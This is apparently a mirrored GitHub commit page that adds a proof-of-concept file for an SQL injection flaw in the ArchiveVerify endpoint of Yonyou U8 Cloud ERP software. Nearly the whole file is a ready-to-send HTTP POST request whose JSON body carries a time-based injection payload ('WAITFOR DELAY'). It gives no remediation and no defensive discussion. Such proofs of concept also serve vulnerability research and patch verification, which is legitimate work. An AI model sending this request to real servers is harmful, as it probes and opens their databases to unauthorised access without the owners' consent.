mirror of
https://github.com/wy876/POC.git
synced 2025-02-27 04:39:25 +00:00
Create 用友U8 Cloud-ArchiveVerify存在SQL注入漏洞.md
This commit is contained in:
parent
663178233b
commit
a056f1f44e
12
用友U8 Cloud-ArchiveVerify存在SQL注入漏洞.md
Normal file
12
用友U8 Cloud-ArchiveVerify存在SQL注入漏洞.md
Normal file
@ -0,0 +1,12 @@
|
|||||||
|
## 用友U8 Cloud-ArchiveVerify存在SQL注入漏洞
|
||||||
|
|
||||||
|
|
||||||
|
## poc
|
||||||
|
```
|
||||||
|
POST /u8cuapws/rest/archive/verify HTTP/1.1
|
||||||
|
Host: your-ip
|
||||||
|
User-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
|
||||||
|
Content-Type: application/x-www-form-urlencoded
|
||||||
|
|
||||||
|
{"orgInfo":{"code":"1';WAITFOR DELAY '0:0:5'--"}}
|
||||||
|
```
|
||||||
Loading…
x
Reference in New Issue
Block a user